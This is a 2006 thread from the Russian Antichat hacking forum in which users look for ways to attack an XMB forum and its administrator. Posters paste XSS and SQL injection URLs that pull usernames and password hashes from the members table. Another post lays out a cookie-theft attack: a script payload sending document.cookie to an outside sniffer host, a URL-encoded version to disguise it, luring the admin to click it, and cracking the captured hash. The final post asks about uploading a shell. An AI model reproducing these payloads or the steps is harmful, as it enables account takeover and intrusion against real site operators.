ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть ли уязвимости у Xmb ?
  #1  
Старый 12.07.2006, 13:17
Аватар для netzzz
netzzz
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме:
247533

Репутация: 4
По умолчанию Есть ли уязвимости у Xmb ?

Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
если не увидел чего .. ткните носом
 
Ответить с цитированием

  #2  
Старый 12.07.2006, 13:19
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Форум просто не сильнопопулярный по этому особо нечего и нет....
Я поищу если что найду стоящие то выложу....

Тебя какие версий интересуют ?
 
Ответить с цитированием

  #3  
Старый 14.07.2006, 05:46
Аватар для j0nathan
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
Thumbs up

[CODE]Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

Программа: XMB 1.9.3, возможно более ранние версии
Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения

Программа: XMB Forum 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/u2u.php?action=send&username=
Код:
 
Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518) 
Опасность: Средняя 

Наличие эксплоита: Да 

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение. 

Пример/Эксплоит: 

http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>

http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
</%73cript>

http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x


http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
(document.cookie);</%73cript>

text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]


text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2


 http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL 
SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
LIMIT 1/*

http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
 NULL,NULL,password FROM xmb_members WHERE uid=1
LIMIT 1/*

Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta 
Опасность: Средняя 

Наличие эксплоита: Да 

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. 

Пример/Эксплоит: 

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9

http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,
1%20LIMIT%201%20/*

http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>

http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>

http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>

htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>

http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>

Программа: XMB Forum 1.9.1 
Опасность: Низкая 

Наличие эксплоита: Нет 

Описание: 
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей. 

Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Это ещё не все
Код:
http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
в иксМБ много иксс! Можно спокойно мд5 угнать

Последний раз редактировалось Azazel; 14.07.2006 в 10:39..
 
Ответить с цитированием

  #4  
Старый 14.07.2006, 07:08
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .
 
Ответить с цитированием

  #5  
Старый 14.07.2006, 08:28
Аватар для j0nathan
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
По умолчанию

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения


А какой запрос делать чтобы хэш увидеть у первого id ??
 
Ответить с цитированием

  #6  
Старый 14.07.2006, 09:40
Аватар для netzzz
netzzz
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме:
247533

Репутация: 4
По умолчанию

вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу
 
Ответить с цитированием

  #7  
Старый 14.07.2006, 11:43
Аватар для j0nathan
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
По умолчанию

Возможно нет вслудуйщей мне кажеться залатают дыру
 
Ответить с цитированием

  #8  
Старый 14.07.2006, 12:15
Аватар для netzzz
netzzz
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме:
247533

Репутация: 4
По умолчанию

да кстати версия которая меня интерисует 1.9.5
а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации
 
Ответить с цитированием

  #9  
Старый 14.07.2006, 13:47
Аватар для j0nathan
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
По умолчанию

Зарегайся на форуме и проверь xss
Код:
http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>
если алерт пашет то пиши в ПМ админу типа чё за косяк
Код:
http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Есть в инете специальные скрипты
но можно немного скрипт сниффа приныкать но можно лучше сныкать
Код:
http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь Кстати ПС
тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог
http://antichat.ru/sniff/log.php
Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3
 
Ответить с цитированием

  #10  
Старый 17.07.2006, 10:32
Аватар для netzzz
netzzz
Познающий
Регистрация: 11.08.2005
Сообщений: 38
Провел на форуме:
247533

Репутация: 4
По умолчанию

в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие уязвимости есть в IPB v1.1.2? Inferno Форумы 2 26.06.2007 22:23
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ